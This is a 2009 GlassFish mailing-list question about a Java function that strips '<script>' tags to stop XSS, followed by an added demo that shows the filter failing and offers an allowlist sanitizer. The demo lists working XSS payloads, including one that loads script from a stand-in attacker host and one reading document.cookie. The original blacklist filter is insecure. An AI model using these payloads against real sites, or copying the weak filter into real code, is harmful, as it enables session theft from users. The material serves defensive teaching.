users@glassfish.java.net

Disabling Cross Site Scripting

From: Lasitha Kodikara <lasithabk_at_millenniumit.com>
Date: Tue, 13 Oct 2009 14:32:42 +0530

Hi All,

In our application, we recently figured out that there are some XSS (Cross
Site Scripting) vulnerabilities. First I was thinking of using an HTML encoding
mechanism to overcome this issue. But then I figured out that we need to
display HTML tags, since we allow the users to save text formatting.

I just wrote a small function to overcome XSS; this only removes <script>
tags from the string.

Here's the code:

public static String removeScriptTags(String string)
{
    if (string == null)
    {
        throw new NullPointerException(
                "String sent to remove script tags method is null");
    }

    // Search a lower-cased copy so the match is case-insensitive,
    // without converting the original string to lower case.
    String tmp = string.toLowerCase();

    if (tmp.contains("<script>"))
    {
        int scriptIndex = tmp.indexOf("<script>");
        // take the tag in its original case, then drop every occurrence of it
        String script = string.substring(scriptIndex, scriptIndex + 8);
        string = string.replaceAll(script, " ");
        // the string may have changed length; re-derive the lower-cased copy
        tmp = string.toLowerCase();
    }

    if (tmp.contains("</script>"))
    {
        int scriptIndex = tmp.indexOf("</script>");
        String script = string.substring(scriptIndex, scriptIndex + 9);
        string = string.replaceAll(script, " ");
    }

    return string;
}


Can you please let me know whether the above code is sufficient, or is there a
built-in option in GlassFish Server to overcome this?

Best regards,

Lasitha
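The following Java program is an added illustration for this thread; it is not code from the original post and not part of GlassFish. It re-implements the posted blacklist compactly, runs it over a few constructed payloads that carry no literal "<script>" and therefore pass through untouched, and places an allowlist-based sanitizer beside it that rebuilds the output from a fixed set of attribute-less formatting tags and HTML-encodes everything else. The class name XssFilterDemo, the method names, the tag set in ALLOWED_TAGS, the payload strings and the host attacker.invalid are all assumptions made for the example (Java 9 or later, for Set.of).

```java
import java.util.Locale;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Demonstrates why a "<script>" blacklist is not an XSS defence and what an
 * allowlist-based sanitizer for user-supplied formatting looks like.
 * Added example; names, tag set and payloads are the editor's assumptions.
 */
public class XssFilterDemo {

    // Compact re-implementation of the blacklist posted above: it deletes the
    // literal strings "<script>" and "</script>", matched case-insensitively,
    // and leaves everything else alone.
    static String removeScriptTags(String s) {
        String out = s;
        for (String tag : new String[] {"<script>", "</script>"}) {
            int i = out.toLowerCase(Locale.ROOT).indexOf(tag);
            if (i >= 0) {
                out = out.replace(out.substring(i, i + tag.length()), " ");
            }
        }
        return out;
    }

    // Constructed payloads (not from the original post). None contains the
    // literal "<script>", so the blacklist returns each one unchanged, yet each
    // runs attacker script when a browser renders it as HTML.
    static final String[] BYPASSES = {
        "<img src=x onerror=alert(1)>",                    // event handler, no script tag
        "<svg onload=alert(document.cookie)>",             // another event handler
        "<a href=\"javascript:alert(1)\">click me</a>",    // javascript: URL
        "<script src=//attacker.invalid/x.js></script >",  // attribute, and a space before '>'
    };

    // Allowlist approach: output is rebuilt from scratch. Only these
    // attribute-less formatting tags are emitted; every other character,
    // including any '<' that does not start an allowed tag, is HTML-encoded.
    // The set is an assumption; use whatever formatting the application needs.
    static final Set<String> ALLOWED_TAGS =
            Set.of("b", "i", "u", "em", "strong", "p", "br");

    // An opening or closing tag with NO attributes, e.g. "<b>", "</P>", "<br/>".
    // Because attributes never match, onerror=, href= and friends never reach
    // the output.
    private static final Pattern BARE_TAG =
            Pattern.compile("<(/?)([A-Za-z]+)\\s*/?>");

    static String sanitizeFormatting(String untrusted) {
        StringBuilder out = new StringBuilder(untrusted.length());
        Matcher m = BARE_TAG.matcher(untrusted);
        int pos = 0;
        while (pos < untrusted.length()) {
            char c = untrusted.charAt(pos);
            if (c == '<' && m.region(pos, untrusted.length()).lookingAt()) {
                String name = m.group(2).toLowerCase(Locale.ROOT);
                if (ALLOWED_TAGS.contains(name)) {
                    // Emit a normalised tag, never the attacker's bytes.
                    out.append('<').append(m.group(1)).append(name).append('>');
                    pos = m.end();
                    continue;
                }
            }
            out.append(encode(c));
            pos++;
        }
        return out.toString();
    }

    // HTML text-context encoding for the five significant characters.
    static String encode(char c) {
        switch (c) {
            case '<':  return "&lt;";
            case '>':  return "&gt;";
            case '&':  return "&amp;";
            case '"':  return "&quot;";
            case '\'': return "&#39;";
            default:   return String.valueOf(c);
        }
    }

    public static void main(String[] args) {
        for (String p : BYPASSES) {
            System.out.println("payload   : " + p);
            System.out.println("blacklist : " + removeScriptTags(p));
            System.out.println("allowlist : " + sanitizeFormatting(p));
            System.out.println();
        }
        // Legitimate formatting survives the allowlist; case and "/>" are normalised.
        System.out.println(sanitizeFormatting("<b>bold</b> & <I>italic</I><br/>"));
    }
}
```

Running it shows every payload coming back from removeScriptTags byte-for-byte unchanged, while sanitizeFormatting turns each into inert text and keeps only the bold/italic/line-break markup. The sanitizer shown here does not check that tags are balanced and is deliberately far simpler than a real HTML parser; for production code the safer choice is a maintained allowlist-based library such as the OWASP Java HTML Sanitizer (org.owasp.html), with the hand-written version serving only to show the principle: decide what is allowed and encode everything else, rather than trying to enumerate what is forbidden.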


